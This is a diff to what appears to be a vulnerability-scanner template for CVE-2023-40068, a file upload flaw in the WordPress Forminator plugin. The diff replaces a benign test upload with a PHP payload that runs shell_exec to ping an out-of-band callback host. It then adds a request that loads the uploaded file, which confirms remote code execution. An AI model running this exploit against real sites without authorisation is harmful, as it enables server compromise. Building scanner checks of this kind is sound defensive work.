diff --git a/http/cves/2023/CVE-2023-40068.yaml b/http/cves/2023/CVE-2023-40068.yaml
index 3cb0eb2a46..d5624a1d9a 100644
--- a/http/cves/2023/CVE-2023-40068.yaml
+++ b/http/cves/2023/CVE-2023-40068.yaml
@@ -10,6 +10,7 @@ info:
     - https://www.exploit-db.com/exploits/51664
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve
     - https://plugins.trac.wordpress.org/changeset/2954409/forminator/trunk/library/fields/postdata.php
+    - https://github.com/E1A/CVE-2023-4596
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -33,10 +34,16 @@ http:
         Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe
 
         ------WebKitFormBoundaryBLOYSueQAdgN2PRe
-        Content-Disposition: form-data; name="postdata-1-post-image"; filename="test.php"
+        Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}"
         Content-Type: application/x-php
 
-        test
+        <?php
+        $domain = "{{interactsh-url}}";
+        $ip = gethostbyname($domain);
+        $command = "ping -c 4 " . $ip;
+        $output = shell_exec($command);
+        echo "<pre>$output</pre>";
+        ?>
         ------WebKitFormBoundaryBLOYSueQAdgN2PRe
         Content-Disposition: form-data; name="forminator_nonce"
 
@@ -54,15 +61,9 @@ http:
 
         forminator_submit_form_custom-forms
 
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - extension is not allowed.
-
-      - type: status
-        status:
-          - 200
+      - |
+        GET /wp-content/uploads/{{date_time("%Y-%M")}}/{{randstr}} HTTP/1.1
+        Host: {{Hostname}}
 
     extractors:
       - type: regex